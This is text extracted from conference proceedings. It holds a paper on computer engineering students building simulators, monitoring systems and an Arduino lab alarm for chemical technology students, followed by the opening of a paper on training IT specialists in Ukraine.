https://doi.org/10.1504/IJLT.2008.019376 33. Souabi, S., Retbi, A., Idrissi, M.K., Bennani, S.: Towards an evolution of e-learning recommendation systems: from 2000 to nowadays. Int. J. Emerg. Technol. Learn. 16(06), 286–298 (2021). https://doi.org/10.3991/ijet.v16i06.18159
Training IT Experts in Universities
Creating of Applied Computer Developments in the Educational Process in the Training of Chemists-Technologists Olga Sergeyeva and Liliya Frolova(B) Ukrainian State University of Chemical Technology, Dnipro, Ukraine [email protected]
Abstract. Independent works (in the form of applied developments) have an influence on the formation of students of different areas of learning skills of professional orientation and communication in cooperation and skills of customer-performer relationships in active cognitive creative activity of students. The object of research is the process of creating computer developments related to chemical technology. The subject of research is the interaction of students of different specialties. This approach reveals the use of all functions of independent work, i.e.: cognitive, prognostic, educational, corrective and independent ones. It should be noted that this approach significantly expands the worldview of students-performers. In addition, there is an increase in students’ self-esteem and self-confidence. It is established that the most expedient for students majoring in 123 - Computer Engineering is the development of computer simulators of laboratory installations or production lines, specialized computer systems for experiments or laboratories, development of computer systems for process monitoring. Keywords: Independent work of students · technological process · applied computer developments · computer engineering
1 Introduction In the future, students and teachers need to respond in a timely manner to changes in the environment and society. Their further success on the chosen path depends on the quality of students’ education. Therefore, the issue of cooperation between teachers and students of different fields of study in order to push the boundaries of horizons and gain practical skills becomes relevant. For example, the possibility of professional growth of teachers and lecturers is considered [1–3]. Given the complex tasks to be solved by both the teacher-technologist and the student, it is obvious that it is necessary to involve students in scientific and practical activities, create the necessary conditions for participants to realize their abilities and talents, and promote interdisciplinary learning. As part of undergraduate practice, students need to develop technological schemes, study the properties of new substances, model processes [4, 5]. © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 567–581, 2023. https://doi.org/10.1007/978-3-031-35467-0_34
568
O. Sergeyeva and L. Frolova
In addition, future professional activities of most students will be associated not only with the use and development of computer technology, but also with communication with customers, etc. Moreover, the use of computer technology in the educational process opens up great opportunities for the development of cognitive abilities – from sensoryperceptual to speech-mental forms. However, these opportunities are significantly limited in the field of values, motivation, goal setting and other aspects of the human psyche [6, 7], so it is necessary to maintain professional cooperation between students and graduate students. The above can be classified as independent work of students. The concept of “independent work” can be considered in two senses: 1) as an active cognitive creative activity of the student, which is present in any type of study; 2) as one of the types of training sessions under the guidance of a teacher, but without his personal participation. It has been established [8] that only the knowledge that the students have acquired independently, due to their own experience, thoughts and actions, will be really strong. In the process of teaching educational material, 15% of information perceived by ear is assimilated, and 65% is assimilated by hearing and sight. At the same time, if the educational material is processed independently (individually), then at least 90% of the information is assimilated. The main functions of independent work of students are given in Table 1. Expanding the functions of independent student work [9] not only leads to an increase in its importance, but also causes a change in the relationship between teacher and student as equal subjects of educational activities, i.e. adjusts all psychological and pedagogical means such as of independent student work or cooperation. The work [10] analyzes the importance of strengthening the relationship between technical and humanitarian principles of engineering education in the renovation of a higher technical school and training of specialists with a set of competencies corresponding to challenges of the 4th industrial revolution. Table 1. Functions of independent work of students Function
Definition
Independent
formation of skills and abilities, their independent updating and creative application
Cognitive
determined by the student’s mastery of systematic knowledge of disciplines
Prognostic
ability of students to predict and evaluate in time as a possible result
Corrective
determined by the ability to adjust their activities in a timely manner
Educational
formation of independence as character traits
The article [11] shows that working in the conditions of digitalization in educational sphere requires complex transformations both in the school system and in the system of pedagogical education under the influence of progressive digital technologies. The authors [12] propose a structure of the educational process of a new type, when the educational activity must coincide with the generalized structure of the activity. The
Creating of Applied Computer Developments in the Educational Process
569
correctness of the hypothesis is confirmed by the successful testing of this concept on the example of continuous geometric and graphic training of students of a technical university. The importance of developing the competencies of an engineering university teacher in accordance with the trends of modern education is obvious [13]. The authors [14] establish the development and realization of a new strategy of continuing engineering education on the grounds of transdisciplinarity and association of engineering, economic, linguistic and IT knowledge. In addition, the issue of interaction between different specialists is very important. Some of them act as customers, others as developers or project executors. At the same time, taking into account modern trends, the performers, as a rule, are IT specialists, and the customers are specialists from other areas. However, the customer may have a problem with the exact formulation of the requirements and their coordination with the contractor, and the performers may have problems with the coordination and implementation of these requirements, as well as with the exact observance of deadlines. It is necessary to provide students with the opportunity to gain such experience in the learning process. Thus, in this work, the task is to study the possibility of interaction between students of various specialties in the process of implementing projects by them in the role of a customer - an executor. The goal in this case is for students to gain experience of interaction in real projects. Next, examples of cooperation between students majoring in 123 - Computer Engineering and 161 - Chemical Technology and Engineering in the design and development of software products and specialized computer systems will be considered.
2 Materials and Methods The methods used in the development of projects were computer modeling methods, writing, debugging and testing programs and sketches, conducting practical tests of designed objects, and conducting experimental laboratory studies on the developed equipment. The use of a computer monitoring system in laboratories, combined with experimental research, is the basis for the most effective use of available equipment. In general, the basis of the organizational structure of monitoring is an automated information system (AIS), which is created on the basis of computer tools. The main issue in the organization of AIS is its informational, technical and mathematical support. Information enters the AIPS through information communication channels from receiving devices: sensors of various designs and functional purposes. From the receiving device, the information undergoes hardware noise filtering and is subjected to primary processing using standard programs and interpreted. Next, the information enters the database, where it is accumulated and used for further processing. AIS technical support is a complex of hardware means of information storage and processing.
570
O. Sergeyeva and L. Frolova
The mathematical support of AIS is built on the basis of 3 blocks of programs: search with static data processing, predictive and diagnostic block, and optimization. At the same time, search programs must perform the functions of entering new data about objects of observation in the monitoring system and their storage, primary analysis and access to already existing data. Among the Arduino modules used in the following time: Arduino Uno, Arduino Leonardo, Arduino Ethernet, Arduino Mega 2560, Arduino Mini, Arduino Micro, Arduino Due, LilyPad Arduino, Arduino Pro, Arduino Yún, Arduino NANO 2.x, Arduino NANO 3.0, when designing the robot, Arduino NANO 3.0 was chosen. The advantages of this module are its small size and ATmega328 memory, the volume of which is 32 KB (of which 2 KB is allocated for the bootloader). The connection to the PC is made via a mini USB cable. Among the Arduino components, one was chosen, which, with its miniature dimensions, allows you to place a video camera. The creation of AIS was based on the analysis of the object of study. The control object was a chemical-technological plasma unit (CTPU) designed for the production of oxygen-containing nanosized compounds. A feature of this HTPU was its use in mini-productions (laboratories), combined with experimental research work. Note that the most easily controlled methods are based on the use of various electrochemical processes [15]. In technologies based on the use of nonequilibrium contact plasma, the latter is used to treat solutions in order to obtain new compounds under conditions [16, 17] that favor the formation of nanodispersed compounds of various compositions [18, 19]. The plasma-chemical reactor, in which the main transformations in liquid media take place, is a device in which a whole complex of processes is combined. The main ones can be considered electrochemical, plasma-chemical, chemical, cavitation processes of gas bubbles formed as a result of water decomposition, diffusion, heat transfer, etc. The general scheme of the processes is shown in [17]. Note that the main processes leading to the appearance of reaction products occur at the phase boundary and at the cathode. However, when using solutions, chemical processes can occur in the entire volume of the liquid, and therefore it is necessary to determine the optimal parameters of the processes.
3 Results It is known that a student majoring in computer engineering must learn to [20]: • • • • • • • • • •
understand and create computer circuits; know the architecture of computers; create application and system programs; understand how peripherals are built and work; design complex computer systems; analyze and model systems; understand the theory of information and coding; understand the theory of automatic control; use software development standards; use methods and tools of computer information technology;
Creating of Applied Computer Developments in the Educational Process
571
• use methods and tools to automate the design of computer systems; • organize parallel and distributed calculations. Accordingly, a student majoring in 161 - Chemical Technology and Engineering must in turn learn [21]: • basics of physics, chemistry, higher mathematics, geology, hydrology, ecology and other engineering fields for modeling and solutions of specific engineering problems; • theoretical provisions and laws of chemistry, physics, thermodynamics, chemical kinetics in the conditions of production for the calculation of physicochemical data, selection and justification of optimal parameters for the preparation of technological regulations or specifications. • to determine the physicochemical parameters of technological processes and make decisions on their adjustment; • to develop new and modernize existing chemical-technological schemes for obtaining target products; • to control technological parameters of the chemical-technological process and make decisions on adjusting the technological regime; • to monitor the state of the radiation situation with the help of devices and systems of radiation control; • to organize and control nuclear, environmental and radiation safety of facilities and territories; • to conduct the technological process of liquid radioactive waste processing; • to carry out the processes of decontamination of surfaces of different configurations; • to perform laboratory tests; • to determine physical and chemical indicators of drinking and natural water quality; • to analyze and control the process of wastewater treatment; • to operate and conduct inspections of the technical condition of facilities, technological and ancillary equipment for wastewater treatment; • to develop technological schemes of sewage and industrial water treatment taking into account modern equipment. Therefore, the most appropriate for students majoring in 123 - Computer Engineering in this case will be the development of computer simulators of laboratory installations or production lines, development of specialized computer systems for experiments or laboratories, development of computer systems monitoring process [22]. At the same time students, postgraduate students majoring in 161 - Chemical Technology and Engineering learn to develop a technical task for development with detailed requirements and work with contractors, and students majoring in 123 - Computer Engineering learn to work with the customer, performing tasks. Consider the developments of students that have emerged through this collaboration. 3.1 Computer Simulation Computer simulation of chemical-technological processes used in training helps to significantly improve the speed and quality of training. The model - simulator of the system presented in Fig. 1 is designed for the technological process of obtaining nanosized cobalt compounds.
572
O. Sergeyeva and L. Frolova
Example of working with the model: 1. Enter data on the volume of incoming substances (Fig. 1(a), (b)): 2. If the value entered is a string, the program will notify you of the error, indicating the field in which it was made. 3. If the value does not fall within the software range, the weight sensor will “light up” in red. 4. The user (instructor) can artificially put the system into operation at any time by pressing the “Break” key. The current parameter on which the sensor does not check fails. For example, discrepancies in residue level, temperature, lack of cooling, etc. (Fig. 1(d), (e)). 5. The user can also correct the status by pressing the “Fix” key (Fig. 1(d)). 6. At each point in time in the right corner displays the set of states of each sensor of the operating component, where “True” means compliance with the norm, and “False” non-compliance (Fig. 1(c), (d), (e), (f)). As a programming language, Web development languages were used: HTML, CSS, JavaScript. 3.2 Monitoring System In the general case, during the laboratory experiment should be a scheme of continuous monitoring, which allows to get the maximum amount of information during the experiment. The object of control is a chemical-technological system designed for the production of cobalt oxide compounds, a block diagram and built on its basis an approximate block diagram which is presented in Fig. 2, respectively. Thus, as a result of processing of the information received during experiments, we can use the dependences received in the form of the set of mathematical equations reflecting the dependence of initial sizes on input ones, supplemented by the restrictions imposed on these sizes, conditions of physical feasibility, requirements of the safety of functioning. The connection with other objects that are a mathematical model of the process. For the process of obtaining products, the model is supplemented by a control algorithm that provides output with the specified indicators. In general, the monitoring system (Fig. 3) is a system of sensors connected by a common bus with a controller and a monitoring unit. From the sensors of the experimental installation, signals of different physical nature at certain points in time, set by the sensor interrogator, are fed to the input of the signal-code conversion. Then they come through the controller to the monitoring unit, and from it to the data collection and storage unit and the decision-making unit. If the indicators do not meet the standards, the expert system included in the decision-making unit determines the cause and diagnoses the fault. In addition, due to the intensive use of the installation, we consider it appropriate to include in the monitoring system the ability to assess the status of individual components (equipment) of the system, such as monitoring current values of compressor performance and pressure compared to design values.
Creating of Applied Computer Developments in the Educational Process
573
Fig. 1. Control system model for technological process of obtaining nanosized cobalt compounds
574
O. Sergeyeva and L. Frolova
Fig. 1. (continued)
Creating of Applied Computer Developments in the Educational Process
575
Fig. 2. Approximate block diagram of the process of obtaining cobalt compounds using a plasma chemical 1-reactor: 1 – sensor, 2 – tachometer, 3 – reaction to SO2– 4 , 4 – liquid sensor, 5 – temperature sensor, 6 – strain gauge, 7 – pressure sensor, 8 – temperature sensor, 9 – psychometer, 10 – mixing tub, 11 – centrifuge, 12 – tank for washing, 13 – plasma chemical reactor with built-in sensors, 14 – compressor, 15 – heat exchanger, 16 – filter/dryer, 17 – packaging
The result is transmitted to the experimental data processing subsystem, which transmits control signals over the controller bus to the controlled components. Fault information is displayed on the GUI subsystem, and measurement data is entered into the database. The central element of the system is the controller, which performs the following functions: • • • • •
receiving information from sensors; logical processing of analog and discrete information; calculation of actual values of parameters; checking the actual values of parameters for compliance with regulatory norms; formation of control signals. The interface is:
• display of parameters presented in graphical form; • formation of reports on deviations of parameters from the norms of technological regulations; • formation and display of recommendations for adjustment of the technological process based on the values of the measured parameters; • archiving of the received information with the set period and display of archival data on request is provided. The use of a computer monitoring system in mini-productions (laboratories) combined with experimental research is a serious help for the most efficient use of existing equipment. This is especially true for the development of technologies based on the use of contact non-equilibrium low-temperature plasma. By reducing the time for research and by compiling a more complete picture of the process as a result of removing a set of characteristics, as well as reducing material
576
O. Sergeyeva and L. Frolova
Fig. 3. Block diagram of the monitoring system of the installation for the production of cobalt compounds
costs due to improper operation of equipment, the cost of developing new technologies is significantly reduced. 3.3 The Computer Simulator of the Laboratory Plasma-Chemical Installation Intended for Processing of Liquid Environments The software model reflects the main elements of the actual installation, takes into account the performance of sensors, allows to set quantitative parameters that affect the process of installation (Fig. 4). In the implementation of this simulator we have used web development languages: HTML, CSS, JavaScript. CSS framework Materialize has also been used to stylize custom components. Norm indicators: • Range of current strength values: [10: 150] mA; • Range of air pressure values: [−0.6: −0.9] atm.
Creating of Applied Computer Developments in the Educational Process
577
Fig. 4. Computer simulator laboratory plasma chemical reactor designed for processing liquid media
During the development there were difficulties in the work: • a large number of DOM elements, their management and change in real time, this problem was solved with the help of libraries and JavaScript frameworks; • creation of an animated visualization of the combustion process and filling the reactor with liquid, this problem was solved with the help of CSS-animation. 3.4 Use in the Laboratory Complex of a Computer System Based on the Arduino Microprocessor System Features of laboratories for chemical research, high requirements for fire, explosion and intrusion protection. Thus, it is possible to formulate the requirements that must be met by the alarm system: • • • • • •
report of theft or intrusion (using an audible siren); support for external systems such as sound siren, light alarm; autonomous operation without external power supply; possibility of reporting a fluid leak; ability to report a gas leak; ability to connect sensors – an indicator of hazardous substances.
Note that the Arduino is an open electronic platform that includes so-called starter kits and open source software designed to quickly create interactive electronic devices. From other Arduino modules at the moment: Arduino Uno, Arduino Leonardo, Arduino Ethernet based on ATmega328, Arduino Mega 2560, Arduino Mini, Arduino Micro, Arduino Due, LilyPad Arduino, Arduino Pro, Arduino Yún [23–25], the best is Arduino Uno, with enough features to solve the problem and attractive cost. In the development of alarms that meet these requirements were used (Fig. 5): • Arduino module;
578
O. Sergeyeva and L. Frolova
• set of functional sensors; • autonomous power supply; • external drives. When one of the connected sensors is triggered, the signal is transmitted to the processor of the Arduino module. Using the downloaded user software, the microprocessor performs its processing according to a certain algorithm. As a result, a command can be generated to start the external drive. If necessary, a special GSM module can be connected to the Arduino module via an expansion card so that the owner of the protected laboratory can send warning signals. It has a SIM card from one of the cellular operators. The following components were used to create the Arduino security system: • • • • • • •
Arduino Uno board; high-contrast 16 × 2 LCD display; 4 × 4 keyboard; potentiometer 10–20 kO; 3 reed switches; 3 2-contact screw terminals; ultrasonic sensor HC-SR04.
Fig. 5. Wiring diagram of modules
Arduino-based burglar alarm design data can be used as a basis for the development of burglar alarm systems. Computer alarm system can be used in various industries, and unlike other similar systems, its cost is much lower. It can also be easily integrated into other alarm systems and redesigned for the user. As we can see, all the above developments are of an applied nature and are intended for use by students and graduate students of specialty 161 - Chemical Technology and Engineering. A survey of students majoring 123 - Computer Engineering showed that all students who worked on the above developments improved their knowledge of relevant subjects and gained confidence in their abilities.
Creating of Applied Computer Developments in the Educational Process
579
4 Discussion As a result of the implementation of projects, students received practical development skills. Participation in real projects allowed them to master a number of competencies, which undoubtedly raised their level as specialists. Thus, the design of a plant for the production of oxygen-containing cobalt compounds made it possible to work out several technology options and determine the most cost-effective ones in terms of raw materials and associated costs, in addition, the resulting scheme is a simulator that can be used to train students in the specialty 161- Chemical Technology and Engineering. Students of specialty 123 - Computer Engineering gained experience working with a customer while working in another field. The development of a computer simulator for a laboratory plasma-chemical installation made it possible to significantly speed up the training of students of specialty 161 - Chemical Technology and Engineering on this laboratory equipment, students of specialty 123 - Computer Engineering gained experience in working with non-standard equipment. During the development of the simulator, students 123 - Computer Engineering were able to make a number of suggestions for improving the installation. The development of signaling in the laboratory is of a practical nature and, in addition to the experience already gained by the students of the specialty 123 Computer Engineering, allows to further introduce additional components. When new customer requirements arise. The robot-videocart, developed by students of specialty 123 - Computer Engineering, allows video surveillance and video filming in the laboratory, both during experiments and when students perform laboratory work. Thus, we can talk about the usefulness of such projects both for students of specialty 123 - Computer Engineering, and for students of specialty 161 - Chemical Technology and Engineering, both in terms of gaining experience in interaction, communication, and in terms of improving students’ professional skills.
5 Conclusions Robots (in the form of applied developments) have an influence on the formation of students in different areas of learning skills of professional orientation and communication in cooperation and skills of customer-performer relationships in active cognitive creative activity of students. This approach reveals the use of all functions of independent work – cognitive, prognostic. Educational, corrective and independent ones. It should be noted that this approach significantly expands the horizons of students-performers. In addition, there is an increase in students’ self-esteem and confidence in their abilities. The most appropriate for students majoring in 123 - Computer Engineering in the case of cooperation with students, postgraduate students majoring in 161 - Chemical Technology and Engineering is the development of computer simulators of laboratory installations and production lines, the development of specialized computer systems for experimental experiments and laboratories, the development of computer systems for process monitoring. At the same time students, postgraduate students majoring in 161 Chemical Technology and Engineering learn to develop a technical task for development with detailed requirements and work with contractors, and students majoring in 123 Computer Engineering learn to work with the customer, performing tasks.
580
O. Sergeyeva and L. Frolova
Further research should be devoted to strengthening links between different specialties, which will improve the quality of training and the professional level of specialists. It will allow supplementing the educational program with new disciplines at the levels of master’s and postgraduate students.
References 1. Orishev, J., Burkhonov, R.: Project for training professional skills for future teachers of technological education. Ment. Enlightenment Sci. Methodol. J. 2021(2), 139–150 (2021) 2. Shomirzayev, M.K.: Developing educational technologies in school technology education. In: Next Scientists Conferences, pp. 14–23 (2022) 3. Estriegana, R., Medina-Merodio, J.A., Barchino, R.: Student acceptance of virtual laboratory and practical work: an extension of the technology acceptance model. Comput. Educ. 135, 1–14 (2019) 4. Rivera, F.F., Pérez, T., Castañeda, L.F., Nava, J.L.: Mathematical modeling and simulation of electrochemical reactors: a critical review. Chem. Eng. Sci. 239, 16622 (2021) 5. Sergeyeva, O., Pivovarov, A.: Analysis of prospects to obtaining nanosized metal compounds by treatment of the water solution by contact non-equilibrium plasma. Technol. Audit Prod. Reserves 3(3), 53–57 (2016) 6. Tushar, W., et al.: A motivational game-theoretic approach for peer-to-peer energy trading in the smart grid. Appl. Energy 243, 10–20 (2019) 7. Stepanova, O.P., et al.: Value-motivational sphere and prospects of the deviant behavior. Int. J. Educ. Inf. Technol. (2018). ISSN 2074-1316 8. Morgan, G.: ‘Meaning and soul’: co-working, creative career and independent co-work spaces. In: Pathways into Creative Working Lives, pp. 139–158. Palgrave Macmillan, Cham (2020) 9. Rasulova, Z.: Conditions and opportunities of organizing independent creative works of students of the direction technology in higher education. Int. J. Sci. Technol. Res. 9(3), 5060–5062 (2020) 10. Aladyshkin, I.V., Kulik, S.V., Odinokaya, M.A., Safonova, A.S., Kalmykova, S.V.: Development of electronic information and educational environment of the university 4.0 and prospects of integration of engineering education and humanities. In: Anikina, Z. (ed.) IEEHGIP 2022. LNNS, vol. 131, pp. 659–671. Springer, Cham (2020). https://doi.org/10.1007/978-3-03047415-7_70 11. Tretyakova, T.V., Vlasova, E.Z., Barakhsanova, E.A., Prokopyev, M.S., Sorochinsky, M.A.: Digital education as a new vector of development of education in the northern regions. In: Anikina, Z. (ed.) IEEHGIP 2022. LNNS, vol. 131, pp. 864–870. Springer, Cham (2020). https://doi.org/10.1007/978-3-030-47415-7_93 12. Dreher, R., Kondratyev, V.V., Kazakova, U.A., Kuznetsova, M.N.: New concept of engineering education for sustainable development of society. In: Auer, M.E., Rüütmann, T. (eds.) ICL 2020. AISC, vol. 1329, pp. 819–831. Springer, Cham (2021). https://doi.org/10.1007/978-3030-68201-9_81 13. Olga, K., Svetlana, B., Julia, K.: The main trends in the development of engineering education: the role of the university teacher in systemic changes. In: Auer, M.E., Tsiatsos, T. (eds.) ICL 2018. AISC, vol. 916, pp. 495–502. Springer, Cham (2020). https://doi.org/10.1007/978-3030-11932-4_47 14. Sharipov, F.F., Krotenko, T.Y., Dyakonova, M.A.: Transdisciplinary strategy of continuing engineering education. In: Ashmarina, S.I., Mantulenko, V.V., Vochozka, M. (eds.) ENGINEERING ECONOMICS WEEK 2020. LNNS, vol. 139, pp. 480–488. Springer, Cham (2021). https://doi.org/10.1007/978-3-030-53277-2_57
Creating of Applied Computer Developments in the Educational Process
581
15. Fuller, T.F., Harb, J.N.: Electrochemical Engineering. Wiley, Hoboken (2018) 16. Frolova, L.A., Derimova, A.V.: Factors controlling magnetic properties of CoFe2O4 nanoparticles prepared by contact low-temperature non-equilibrium plasma method. J. Chem. Technol. Metall. 54(5), 1040–1046 (2019) 17. Frolova, L.A.: The mechanism of nickel ferrite formation by glow discharge effect. Appl. Nanosci. 9(5), 845–852 (2018). https://doi.org/10.1007/s13204-018-0767-z 18. Frolova, L., Pivovarov, A., Tsepich, E.: Non-equilibrium plasma-assisted hydrophase ferritization in Fe2+–Ni2+–SO42−–OH− system. In: Fesenko, O., Yatsenko, L. (eds.) Nanophysics, Nanophotonics, Surface Studies, and Applications. SPP, vol. 183, pp. 213–220. Springer, Cham (2016). https://doi.org/10.1007/978-3-319-30737-4_18 19. Frolova, L., Derimova, A., Butyrina, T.: Structural and magnetic properties of cobalt ferrite nanopowders synthesis using contact non-equilibrium plasma. Acta Phys. Pol. A 133(4), 1021–1023 (2018) 20. Standard of higher education of Ukraine First (undergraduate) level bachelor Field of knowledge 12 Information technologies Specialty 123 Computer engineering. https://mon. gov.ua/storage/app/media/vishcha-osvita/zatverdzeni%20standarty/123-kompyuterna-inz heneriya.pdf 21. Standard of higher education of Ukraine First (undergraduate) level bachelor Field of knowledge 16 Chemical and bioengineering Specialty 161 Chemical technologies and engineering. https://mon.gov.ua/storage/app/media/vyshcha/standarty/2020/06/17/161Khim.tekhn.ta.inzh.bakalavr-10.12.pdf 22. Zhiyun, Z., Baoyu, C., Xinjun, G., Chenguang, C.: The development of a novel type chemical process operator-training simulator. In: Computer Aided Chemical Engineering, vol. 15, pp. 1447–1452. Elsevier (2003) 23. Sergeyeva, O., Pivovarov, A., Pilyaev, V.: Development of monitoring system for producing oxygen-containing compounds of cobalt by plasmo-chemical method. Bull. NTU “KhPI”. Ser. New Solutions Mod. Technol. 18(1190), 153–157 (2016). NTU “KhPI”, Kharkiv. https:// doi.org/10.20998/2413-4295.2016.18.22 24. Jamieson, P.: Arduino for teaching embedded systems. Are computer scientists and engineering educators missing the boat? In: Proceedings of the International Conference on Frontiers in Education: Computer Science and Computer Engineering (FECS). The Steering Committee of The World Congress in Computer Science, Computer Engineering and Applied Computing (WorldComp), p. 1 (2011) 25. Plaza, P., et al.: Arduino as an educational tool to introduce robotics. In: 2018 IEEE International Conference on Teaching, Assessment, and Learning for Engineering (TALE), pp. 1–8. IEEE (2018)
The Potential of Higher Education in Ukraine in the Preparation of Competitive IT Specialists for the Post-War Recovery of the Country’s Economy Oksana Zakharova(B) and Larysa Prodanova Cherkasy State Technological University, Cherkasy, Ukraine {o.zakharova,l.prodanova}@chdtu.edu.ua
Abstract. The rapid recovery of the Ukrainian economy in the post-war period is possible only on the basis of a sufficient number of competitive and motivated IT specialists, whose knowledge will not only quickly compensate for all lost technologies in various areas of the country’s economic activity through military operations, bombardments and occupation, but also significantly improve technical-technological level of the country. To this end, the work has carried out a deep analysis of the potential of higher education institutions in Ukraine to train competitive IT specialists. The main problems of Ukrainian universities in the training of IT specialists are substantiated. A comparison of the focus and content of educational programs of leading universities in the training of IT specialists in Ukraine and the leading countries of the world is made. The factors influencing the level of motivation of Ukrainian IT specialists in the direction of the knowledge acquired during training for the needs of restoring the economy of Ukraine have been determined. Keywords: Ukraine · field of knowledge 12 Information Technology · students · higher education · IT specialists
1 Introduction The forced testing of Ukraine’s economy for viability, which took place in March 2020– February 2022 as a result of the COVID-19 pandemic, has shown that the IT services market has the highest margin of safety and development potential among all economic activities in the country. Thus, according to a study conducted by experts of the Association “IT Ukraine” it is established that in 2021 the IT sector of Ukraine increased by 36% compared to the previous year, and in 2019–2021 the industry grew by more than 50% in number of specialists involved in it (Ukraine 2021). Given the fact that more than 80% of professionals working in the Ukrainian IT services market have a relevant higher education and have a sufficient level of English and the vast majority of them are young people aged 21–30 (Portrait 2019), in the current economic crisis establishing the level of progressiveness of IT education in Ukraine is becoming quite important. The © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 582–595, 2023. https://doi.org/10.1007/978-3-031-35467-0_35
The Potential of Higher Education in Ukraine
583
quality and standard of living, trends in the return to the country of both the population that left the war and labor migrants, the speed of Ukraine’s accession to the EU will depend on the extent to which IT graduates of Ukrainian universities, from professional and motivational points of view, will develop and implement projects aimed at restoring all spheres of life in the post-war period. Publications of many authors were devoted to research of actual aspects of training of competitive IT specialists. Iden J. and Langeland L. chose the factors of IT professionalization through the implementation of platforms based on processes based on best practices (Iden 2010). Opel S., Netzer C.M. and Desel J. proposed an assessment tool to recognize and adapt previous professional experience and training of IT professionals (Opel 2022). Wiggberg M., Gobena E. and Kaulio M. developed an educational program for the rapid integration of foreigners into the IT industry of the local economy (Wiggberg 2022). Pröbster M., Hermann J., Marsden N. proposed a project that aimed to support women IT experts and make them relevant educational content in the field of digitalization and IT, taking into account the individual context of each woman studying (Pröbster 2018). Proskura S., Lytvynova S. (Proskura 2018) substantiated ways to improve the forms and methods of teaching aimed at creating a holistic system of training specialists in information technology in Ukraine, one of the elements of which was selfstudy. Pasichnyk V., Kunanets N. analyzed the main problems of interaction between IT business and IT education to establish effective training of specialists in this field in Ukraine and outlined the key points inherent in the educational field that trained IT professionals and corporations that had successfully positioned in the IT market (Pasichnyk 2015). Appreciating the results of research by the above and other well-known authors, it should be emphasized that Russia’s military aggression against Ukraine has caused a number of serious problems in the Ukrainian higher education system in general and in the training of IT professionals. Such problems are caused primarily by the forced relocation of a significant mass of the population of Ukraine and the destruction and damage to the material base of educational institutions as a result of hostilities. That is why the study of the current capabilities of the higher education system of Ukraine for the training of competitive IT professionals is an important scientific and practical task. The purpose of the work is to assess the ability and potential of higher education in Ukraine in the training of IT professionals who can restore and improve the technical and technological level of Ukraine’s economy in the postwar period and are motivated to do so.
2 Materials and Methods The methodological basis of writing the article is the logical-dialectical method of cognition of economic phenomena and processes. The research is based on the use of methods of comparative and retrospective analysis. The information base of the research consists of data from the IT Ukraine Association (Ukraine 2021); Register of subjects of educational activity, in particular the Unified state electronic database on education (Register 2022); Information system Competition: introductory campaign 2021–2022 (Information 2022); portal Statistics of introductory companies (Statistics 2021).
584
O. Zakharova and L. Prodanova
3 Results In April 2015, the Resolution of the Cabinet of Ministers of Ukraine approved an updated a list of fields of knowledge and specialties for which higher education students were trained in the country (Resolution 2015). According to the Resolution, within the field of knowledge 12 Information Technology, training of specialists in five specialties was introduced: 121 Software Engineering, 122 Computer Science, 123 Computer Engineering, 124 System Analysis and 125 Cybersecurity. Two years later, in response to the requirements of the IT market, which demonstrated the rapid pace of development in Ukraine, within the field of knowledge number 12 the sixth specialty – 126 Information Systems and Technologies was created. Currently, the contingent of students at the bachelor’s and master’s levels of fulltime, part-time and distance learning is 80,650 people (Register 2022). At the moment, 164 higher education institutions are involved in the training of IT specialists in Ukraine (Fig. 1).
30000
150
28621
25000 20000
125 18255
125
100 14857
people
10000 5000
75
10611 63
33 2989
49
0
75 52 5317
50 25 0
units
15000
Number of students, people Number of higher education institutions, units Fig. 1. Distribution of the number of students and the number of higher education institutions in Ukraine by specialties in the field of knowledge 12 Information Technology for June 2022. Source: (Register 2022)
The largest number of students major in 122 Computer Science – 35.5% and 121 Software Engineering – 22.6% of the total number of students in 12 fields of knowledge in the country. The smallest number of students study in the specialties 124 Systems Analysis – 3.7% and 126 Information Systems and Technologies – 6.6% of the total number of students in the field of knowledge number 12 in the country. At the same time, a rather close direct connection has been established between the number of higher
The Potential of Higher Education in Ukraine
585
education institutions within which training in a certain specialty takes place and the number of students receiving it. Territorial distribution and quantitative characteristics of higher education institutions of Ukraine that provide training for IT professionals are given in Table 1 (Appendices). The table does not include cities whose higher education institutions train IT specialists in less than three specialties within the field of knowledge number 12. The analysis has revealed that the training of IT specialists in Ukraine is carried out in all regions of the country, except for the temporarily occupied and annexed territories. Only 16 higher education institutions provide services in all six specialties of the industry. At the same time, the largest average contingent of students is typical of higher education institutions in Kharkiv. According to the criterion of the contingent of students, it can be concluded that as of June 2022, three of the six IT specialties are in the greatest demand among entrants. Thus, in 13 regions of the country, the most common is specialty number 122, in six regions – number 121. The average number of students in the most common specialty in the city per one higher education institution in the country ranges from 91 people – in Cherkasy, and up to 511 people – in Kharkiv. The lowest values of the extremes of the values of the contingent of students in the institution of higher education, which provides educational services in the most common specialty in the city, are observed in Cherkasy, where their values range from 3 to 154 people. Thus, we can conclude that, firstly, the training of IT professionals is conducted simultaneously throughout Ukraine and, secondly, the demand for educational services in the regions is different. The analysis of the contingent of students in terms of specialties, and in general, allows to establish three leading universities, in which the total contingent of IT students exceeds 5 thousand people (Table 2, Appendices). The fourth place is occupied by National Aviation University, but the contingent of its IT students is only 3606 people and the university does not provide services in specialty number 124, so it is not included in our ranking. All other institutions of higher education have a contingent of students in the IT field of less than 2.5 thousand people. National Technical University of Ukraine “Igor Sikorsky Kyiv Polytechnic Institute” is the leader among all higher education institutions in Ukraine in terms of the number of students currently receiving IT education in the country and trains 8.8% of the total contingent of IT students in the country. The University is a leader in three specialties: specialty number 121 has 10.8% of the total contingent of students (10.7% of the bachelor’s market and 11.7% of the master’s market of this specialty); specialty number 124 has 18.4% of the total contingent of students (19.3% of the bachelor’s market and 17.6% of the master’s market of this specialty); specialty number 126 has 23.1% of the total contingent of students (24.3% of the bachelor’s market and 23.8% of the master’s market of this specialty). Lviv Polytechnic National University ranks second in the contingent of students and occupies 7.3% of the market for educational services in the IT sector on this indicator. The University is a leader in two specialties: specialty number 122 has 10.8% of the total contingent of students (8.9% of the bachelor’s market and 6.5% of the master’s market of this specialty); specialty number 125 has 9.5% of the total contingent of students (8.8% of the bachelor’s market and 15.9% of the master’s market of this specialty).
586
O. Zakharova and L. Prodanova
